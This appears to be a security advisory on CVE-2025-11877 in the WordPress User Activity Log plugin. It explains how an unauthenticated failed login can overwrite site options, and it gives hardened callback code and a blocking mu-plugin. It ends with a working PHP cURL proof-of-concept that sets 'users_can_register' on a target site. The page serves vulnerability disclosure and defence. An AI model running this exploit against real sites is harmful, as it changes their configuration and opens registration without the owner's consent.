Atomic Edge analysis of CVE-2025-11877 (metadata-based):
This vulnerability is an unauthenticated options update in the User Activity Log plugin for WordPress, affecting versions up to and including 2.2. The flaw resides in the plugin's failed-login handler and allows an unauthenticated attacker to modify a limited set of WordPress site options. The CVSS score of 7.5 reflects a high integrity impact with no authentication or user interaction required; confidentiality is not affected.
CWE-862 (Missing Authorization) means the code performs a privileged action without checking whether the caller is entitled to it. The public description states that the ‘ual_shook_wp_login_failed’ hook callback writes user-supplied data into an update_option() call without verifying user capabilities. WordPress core's wp_login_failed action, which the callback name suggests it is attached to, passes the attempted username as its first argument, so Atomic Edge infers that the function receives the failed username and uses it unsanitized as the option name (or value). This conclusion rests on the CWE classification and the public description; the plugin source was not available for confirmation.
Exploitation requires nothing more than a failed login. The attacker sends a POST request to the WordPress login URL, wp-login.php, with the username field (‘log’) set to the name of a target option, such as ‘users_can_register’, and an arbitrary wrong password. The plugin's hooked function then calls update_option() on that name, changing the stored value from 0 to a non-zero integer, likely a count of failed attempts. On this reading the attacker chooses which option is written but not the value written, which is why the advisory calls it a limited options update. Because WordPress treats any non-zero value of ‘users_can_register’ as enabled, this reopens user registration; aiming the same write at a serialized array option such as ‘wp_user_roles’ replaces the array with a scalar and corrupts it.
Remediation has two parts. First, the callback must stop letting attacker-controlled input select the option key: failed-login data should be written only to fixed, plugin-owned option names (or a dedicated table), with the username treated as data and sanitized, for example with sanitize_user(). Second, a capability check such as current_user_can(‘manage_options’) belongs wherever the plugin lets a logged-in user change options, but it cannot be the fix inside the failed-login handler itself: wp_login_failed fires for unauthenticated requests by design, so a capability check there would simply disable the logging feature rather than secure it. A patched version would prevent unauthenticated users from influencing which options are updated.
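To make the fix concrete, the following is an added example written for this page, not the plugin's code (whose body is unknown): a hypothetical reconstruction of the flawed pattern inferred above, next to a hardened callback that keeps the option key fixed and treats the username as data. The function names, the option name ‘ual_example_failed_logins’ and the cap of 1000 entries are assumptions.

```php
<?php
// Hypothetical reconstruction of the inferred flaw. This is NOT the User
// Activity Log plugin's code; the real callback body is unknown.
// WordPress core fires: do_action( 'wp_login_failed', $username, $error );

// Flawed pattern: the attacker-chosen username selects which option is written.
// POST log=users_can_register to wp-login.php -> users_can_register goes 0 -> 1.
function ual_example_login_failed_vulnerable( $username ) {
    $count = (int) get_option( $username, 0 );  // attacker picks the key
    update_option( $username, $count + 1 );     // writes wherever they pointed
}

// Hardened pattern: the option key is fixed and plugin-owned, the username is
// data. No capability check is used here on purpose: wp_login_failed always
// fires for an unauthenticated request, so current_user_can() would never pass.
function ual_example_login_failed_hardened( $username, $error = null ) {
    $username = sanitize_user( (string) $username, true );
    if ( '' === $username || strlen( $username ) > 60 ) {
        $username = '(invalid)';
    }

    $log = get_option( 'ual_example_failed_logins', array() );
    if ( ! is_array( $log ) ) {
        $log = array(); // self-heal if the option was ever corrupted
    }

    // Hash the key so raw input never becomes an array key either.
    $key   = hash( 'sha256', $username );
    $entry = ( isset( $log[ $key ] ) && is_array( $log[ $key ] ) )
        ? $log[ $key ]
        : array( 'user' => $username, 'count' => 0 );
    $entry['count']++;
    $entry['last'] = time();
    $log[ $key ]   = $entry;

    // Bound the log so an attacker cannot grow the option without limit;
    // keep the 1000 most recently seen usernames (assumed cap).
    if ( count( $log ) > 1000 ) {
        uasort( $log, function ( $a, $b ) {
            return $a['last'] <=> $b['last'];
        } );
        $log = array_slice( $log, -1000, null, true );
    }

    // Third argument: do not autoload a log-sized option on every request.
    update_option( 'ual_example_failed_logins', $log, false );
}
add_action( 'wp_login_failed', 'ual_example_login_failed_hardened', 10, 2 );
```

The key design point is that the only update_option() call in the hardened version has a string literal as its first argument, so no request parameter can steer the write to ‘users_can_register’ or ‘wp_user_roles’.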
Successful exploitation allows an unauthenticated attacker to alter WordPress configuration. Setting ‘users_can_register’ to a non-zero value enables open registration, creating a pre-authentication account-creation vector and a spam problem; new accounts receive the site's default_role, Subscriber by default, so this is a foothold rather than an immediate privilege escalation. Corrupting the ‘wp_user_roles’ option breaks role and capability resolution for all users, including administrators, which amounts to a denial of service against site administration. The impact is limited to modification of the options the callback can reach and does not, by itself, grant code execution or disclose data.
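For site owners who cannot update the plugin immediately, the following added example (not from Atomic Edge's PoC or from the plugin) is a must-use plugin that virtually patches the issue at the WordPress core level: it hooks the pre_update_option filter, which every update_option() call passes through, and refuses writes to a short list of security-critical options when no user with manage_options is present, logging the blocked attempt so the exploitation attempt is also detected. The list of protected options, the ‘sowg_’ prefix and the log line format are the author's assumptions.

```php
<?php
/**
 * Plugin Name: Sensitive Option Write Guard (illustrative mu-plugin)
 * Description: Added example for this page; not part of User Activity Log.
 *
 * Place in wp-content/mu-plugins/. Hooks core's pre_update_option filter, so it
 * applies regardless of which plugin calls update_option().
 */

// Options an unauthenticated request should never be able to change (assumed list).
function sowg_protected_options() {
    global $wpdb;
    return array(
        'users_can_register',
        'default_role',
        'admin_email',
        'siteurl',
        'home',
        $wpdb->prefix . 'user_roles', // 'wp_user_roles' with the default prefix
    );
}

// Legitimate writers: an administrator, WP-CLI, or the installer.
function sowg_write_allowed() {
    if ( ( defined( 'WP_CLI' ) && WP_CLI ) || ( defined( 'WP_INSTALLING' ) && WP_INSTALLING ) ) {
        return true;
    }
    return function_exists( 'current_user_can' ) && current_user_can( 'manage_options' );
}

/**
 * pre_update_option runs inside update_option() before the database write.
 * Returning $old_value makes update_option() a no-op, because core bails out
 * when the (filtered) new value equals the stored one.
 */
function sowg_guard_option_write( $value, $option, $old_value ) {
    if ( ! in_array( $option, sowg_protected_options(), true ) || sowg_write_allowed() ) {
        return $value;
    }

    // Detection signal: includes the submitted username so a failed-login
    // attempt carrying an option name (e.g. log=users_can_register) is visible.
    error_log( sprintf(
        'sowg: blocked unauthenticated write to option "%s" from %s (%s %s) log=%s',
        $option,
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '-',
        isset( $_SERVER['REQUEST_METHOD'] ) ? $_SERVER['REQUEST_METHOD'] : '-',
        isset( $_SERVER['REQUEST_URI'] ) ? $_SERVER['REQUEST_URI'] : '-',
        isset( $_POST['log'] ) ? sanitize_user( wp_unslash( $_POST['log'] ), true ) : '-'
    ) );

    return $old_value;
}
add_filter( 'pre_update_option', 'sowg_guard_option_write', 10, 3 );
```

Test this on staging before production: any legitimate code path that updates one of the listed options without a logged-in administrator (a migration script, for instance) will be blocked and will show up in the PHP error log with the ‘sowg:’ prefix, which is also where a real exploitation attempt will appear.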
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-11877 - User Activity Log <= 2.2 - Unauthenticated Limited Options Update via Failed Login
/**
* Proof of Concept for CVE-2025-11877.
* This script exploits the missing authorization in the 'ual_shook_wp_login_failed' hook.
* It sends a failed login attempt with a username set to a target WordPress option.
* The plugin then calls update_option() with this username, changing its value from 0.
* Assumptions: The target site uses a vulnerable version (<=2.2) of the User Activity Log plugin.
* The 'users_can_register' option is targeted to enable open registration.
*/
$target_url = 'http://example.com/wp-login.php'; // CHANGE THIS TO THE TARGET SITE URL
// The option name to modify. 'users_can_register' is a standard WordPress option.
// According to the description, the plugin updates the option value to a non-zero integer.
$malicious_username = 'users_can_register';
// Standard WordPress login parameters. A random password ensures login failure.
$post_data = array(
'log' => $malicious_username,
'pwd' => 'atomic_edge_failed_login_attempt_' . rand(),
'wp-submit' => 'Log In'
);
// Initialize cURL session.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // Follow redirects to see response.
// Execute the request to trigger the failed login hook.
echo "[+] Sending malicious failed login request to: $target_url\n";
echo "[+] Username (target option): $malicious_username\n";
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[+] HTTP Response Code: $http_code\n";
// A failed login renders wp-login.php with an error and a 200 status.
if ($http_code == 200) {
    echo "[+] Request completed. The 'users_can_register' option may now be non-zero.\n";
    echo "[+] Verify via the General Settings page, the wp_options table, or by requesting\n";
    echo "    wp-login.php?action=register: a registration form instead of a redirect to\n";
    echo "    wp-login.php?registration=disabled means the option is now truthy.\n";
} else {
    echo "[-] Unexpected HTTP code. The site may have redirects or custom login handling.\n";
}
?>